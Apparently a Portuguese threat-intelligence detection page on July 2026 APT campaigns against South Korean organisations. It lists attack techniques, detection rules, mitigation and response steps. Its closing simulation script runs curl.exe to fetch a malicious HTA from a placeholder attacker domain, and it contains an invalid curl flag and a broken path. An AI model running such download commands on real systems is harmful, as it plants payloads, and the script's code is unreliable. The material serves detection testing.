Relatório Sobre Ameaças APT na Coreia do Sul: Tendências de Julho de 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
A AhnLab relata um aumento na atividade APT visando organizações sul-coreanas através de campanhas de spear-phishing. Os ataques dependem principalmente de arquivos LNK maliciosos para entregar cargas incluindo scripts PowerShell, scripts AutoIt e backdoors. As técnicas comuns incluem persistência através do Agendador de Tarefas e exfiltração de dados por serviços como Dropbox e PubNub.
Investigação
A investigação se concentrou na infraestrutura APT usada contra entidades sul-coreanas durante julho de 2026. Analistas agruparam a atividade em vários tipos de ataques, de A a G, com base nos métodos de entrega e nas características funcionais. Pesquisadores também identificaram comportamentos incluindo DLL side-loading e abuso de utilitários nativos do Windows como curl.exe para recuperação de carga.
Mitigação
Os usuários devem verificar as identidades dos remetentes e evitar abrir anexos recebidos de fontes desconhecidas ou não confiáveis. As organizações devem manter os sistemas operacionais e navegadores da web atualizados com os patches de segurança mais recentes. Também é recomendado manter soluções de antivírus e proteção de endpoint atualizadas, como o V3.
Resposta
Se arquivos LNK suspeitos ou entradas de Agendador de Tarefas não autorizadas forem detectados, os respondentes de incidentes devem isolar imediatamente o host afetado. A forense de memória deve ser realizada para identificar backdoors injetados ou DLLs maliciosas. Os registros de rede também devem ser revisados em busca de conexões de saída incomuns para serviços de hospedagem de arquivos ou canais de comando e controle como o PubNub.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Comportamento Suspeito de Evasão de Defesa MSHTA LOLBAS por Detecção de Comandos Associados (via process_creation)
Uso Suspeito de CURL (via cmdline)
Tarefa Agendada Suspeita (via audit)
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)
IOCs (HashMd5) para detectar: Relatório de Tendências de Ameaças de julho de 2026 sobre Ataques APT (Coréia do Sul)
Curl.Exe Usado para Baixar e Executar Arquivos Maliciosos [Windows Sysmon]
Detectar Comandos Maliciosos do PowerShell dentro de Arquivos LNK [Windows PowerShell]
Execução de Simulação
Pré-requisito: A verificação pré-voo de Telemetria & Baseline deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.
-
Narrativa & Comandos do Ataque: O adversário pretende usar
curl.exepara baixar um arquivo HTA malicioso no%TEMP%diretório para estabelecer um ponto de apoio. Para testar se a lógica atual de detecção está funcionando (pois ele especificamente procura as palavras “download” ou “execute”), o atacante usará uma linha de comando que inclua explicitamente essas palavras como parte de um argumento falso ou descrição, simulando um script mal construído ou uma tentativa específica de imitar o padrão que o SOC está procurando. -
Script de Teste de Regressão:
# Simular um adversário usando curl com as palavras-chave específicas exigidas pela regra $tempPath = $env:TEMPmalicious.hta $url = "http://domínio-controlado-por-atacante.com/payload.hta" # Este comando é projetado especificamente para acionar a lógica 'contém' da regra # incluindo as palavras 'download' e 'execute' na string da linha de comando. Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
Comandos de Limpeza:
# Remover o arquivo dummy criado durante a simulação if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }